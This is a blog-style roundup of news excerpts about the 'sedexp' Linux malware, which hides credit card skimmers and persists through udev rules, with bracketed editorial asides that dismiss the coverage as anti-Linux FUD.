Drive-by FUD from Microsoft-Friendly Sites That Attribute to Linux Something That's Unexplained/Unattributed (and Dub It “sedexp”)
-
TechRadar ☛ This sneaky Linux malware went undetected for years, and is using all-new attack tactics [Ed: This is not the fault of Linux but whatever pulls it in, targeting the system]
Stroz Friedberg believes this piece of malware has been used since at least 2022, and found it in numerous online sandboxes, none of which triggered any antiviruses. The researchers believe the malware was used to hide a credit card skimmer.
-
CyberRisk Alliance LLC ☛ Advanced stealth of new sedexp malware for Linux detailed [Ed: Much focus on what it does once installed, not how it gets installed in the first place]
With the ability to deploy a remote shell allowing remote access to infected devices and memory modification, sedexp has been used by threat actors to facilitate the obfuscation of modified Apache configuration files, web shells, and the udev rule — which was noted by SUSE Linux to enable device node naming, node-pointing link inclusion, and specified program execution — a report from Aon's Stroz Friedberg incident response services team showed. "The malware was used to hide credit card scraping code on a web server, indicating a focus on financial gain. The discovery of sedexp demonstrates the evolving sophistication of financially motivated threat actors beyond ransomware," said researchers.
-
Cyber Security News ☛ Stealthy Linux Malware ‘Sedexp’ Having Zero-detections Since 2022 [Ed: Focuses on persistence, but does nothing to explains how it gets into systems and what the culprit is]
This sophisticated approach makes the malware more stealthier and persistent, which makes it more difficult to detect.
-
Dolphin Publications B V ☛ Sedexp malware hides unseen in Linux kernel for years [Ed: Countermeasures here don't name which piece is vulnerable, whether it's misconfiguration, or a reckless admin installing it]
As a countermeasure, the researchers state that companies should continuously update their detection capabilities for these types of attacks, implement clear security measures to counter these attacks and engage experts to perform forensic investigations to discover potentially compromised servers.
-
Information Security Buzz ☛ Stealthy Linux Malware “sedexp” Exploits udev Rules for Persistence and Evasion
The analysis indicates that sedexp is being deployed by a financially motivated threat actor. So far, the malware has been used for credit card scraping, hiding malicious code on web servers to steal financial information. Despite its widespread presence, sedexp has managed to avoid detection, highlighting its stealthy nature and the need for advanced forensic analysis.
-
Security Affairs ☛ Linux malware sedexp uses udev rules for persistence and evasion [Ed: The researchers seem to be financially motivated and not exceptionally interested in explaining how this malware gets in]
The researchers believe that threat actor behind the malware sedexp is financially motivated.
Mostly hype:
-
New GNU/Linux Malware ‘sedexp’ Hides Credit Card Skimmers Using Udev Rules
Recently, cybersecurity experts revealed a stealthy GNU/Linux malware that can hide credit card skimmers’ codes. However, it is not new malware because Aon’s Stroz Friedberg team discovered and named it Sedexp in 2022. The Sedexp malware remained identified due to the advanced stealth techniques to handle persistence on the systems.